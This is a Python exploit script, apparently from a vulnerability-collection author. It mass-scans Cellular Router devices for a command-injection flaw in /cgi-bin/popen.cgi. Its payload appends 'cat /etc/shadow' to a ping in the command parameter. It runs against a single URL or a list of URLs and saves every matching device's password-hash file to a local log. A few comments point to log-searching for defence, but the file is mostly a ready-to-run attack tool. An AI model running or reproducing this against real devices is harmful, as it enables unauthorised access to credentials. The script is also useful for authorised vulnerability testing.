Cellular_rce_exp.py
# 作者: VulnExpo
# 日期: 2023-9-22
import requests
import argparse
# Every request in this script is sent with verify=False, so urllib3 would
# print an InsecureRequestWarning per call; silence that one category here.
_urllib3 = requests.packages.urllib3
_urllib3.disable_warnings(_urllib3.exceptions.InsecureRequestWarning)
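def check_for_vulnerability(url, proxies=None, success_file=None):
    """Probe one base URL for the popen.cgi command-execution flaw.

    Sends a single GET to ``/cgi-bin/popen.cgi`` whose ``command`` parameter
    chains ``cat /etc/shadow`` after a ping, and treats an HTTP 200 whose
    body contains ``root:`` as evidence that the device ran the command.

    Args:
        url: Base URL of the device; the CGI path is appended as-is.
        proxies: Optional ``requests`` proxy mapping. Defaults to ``None``
            instead of a shared mutable ``{}``.
        success_file: Path of the findings log to append to, or ``None`` to
            skip logging.

    Returns:
        True when the response matched, otherwise False (including when the
        request itself raised). A failure to write the log is reported on
        stdout but no longer turns a positive match into False.
    """
    import os

    # Defenders: this request shape (popen.cgi with a command= query
    # parameter) is what to search for in access logs of the device or of
    # an upstream proxy.
    probe_path = '/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Upgrade-Insecure-Requests': '1',
        'Sec-Fetch-Dest': 'document',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-Site': 'none',
        'Sec-Fetch-User': '?1',
        'Te': 'trailers',
        'Connection': 'close',
    }
    try:
        # verify=False: certificate validation is skipped for this request.
        response = requests.get(url + probe_path, headers=headers, proxies=proxies, verify=False, timeout=30)
        matched = response.status_code == 200 and "root:" in response.text
    except Exception as e:
        print(f"发生异常:{e}")
        return False
    if not matched:
        return False

    if success_file is not None:
        try:
            # On a match the body holds the device's /etc/shadow, i.e.
            # password hashes, so the log is created owner-only (0600).
            fd = os.open(success_file, os.O_WRONLY | os.O_APPEND | os.O_CREAT, 0o600)
            # Explicit UTF-8: the log lines contain non-ASCII text, which a
            # locale-default codec may be unable to encode.
            with os.fdopen(fd, 'a', encoding='utf-8') as s_file:
                s_file.write("++++++++++++++++++\n")
                s_file.write(f"目标URL: {url}\n")
                s_file.write("Payload: ping -c 4 1.1.1.1;cat /etc/shadow&v=0.1303033443137912\n")
                s_file.write(f"响应内容:\n{response.text}\n\n")
        except (OSError, ValueError) as e:
            print(f"发生异常:{e}")
    return True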
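def scan_targets(targets, proxies=None, success_file=None):
    """Run check_for_vulnerability over each entry of *targets*.

    Args:
        targets: Iterable of base-URL strings; surrounding whitespace
            (such as the newline left by ``readlines()``) is stripped.
        proxies: Optional ``requests`` proxy mapping, passed through.
            Defaults to ``None`` instead of a shared mutable ``{}``.
        success_file: Findings log path, passed through unchanged.

    Returns:
        None. Per-target results are not collected here.
    """
    for raw_target in targets:
        target = raw_target.strip()
        if not target:
            # A blank line in a target list is not a URL; skip it rather
            # than issue a request that can only fail.
            continue
        check_for_vulnerability(target, proxies, success_file)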
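if __name__ == '__main__':
    # CLI entry point: take one URL from -u, or a list of URLs (one per
    # line) from -f, and run the check against each.
    parser = argparse.ArgumentParser(description="移动路由器 Cellular Router 命令执行漏洞")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
    args = parser.parse_args()

    # -f defaults to "url.txt", so this only triggers when -f is given an
    # empty value and -u is absent.
    if not args.url and not args.file:
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        # SystemExit instead of the site-provided exit(), which is not
        # guaranteed to exist (e.g. under python -S).
        raise SystemExit(1)

    if args.url:
        urls = [args.url]
    else:
        try:
            with open(args.file, 'r') as file:
                urls = file.readlines()
        except OSError as e:
            # A missing or unreadable list file previously ended in a raw
            # traceback; report it and exit non-zero instead.
            print(f"发生异常:{e}")
            raise SystemExit(1)

    proxies = {}
    success_file = 'success_targets.txt'
    # scan_targets already strips and iterates, so hand it the whole list.
    scan_targets(urls, proxies, success_file)
    print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")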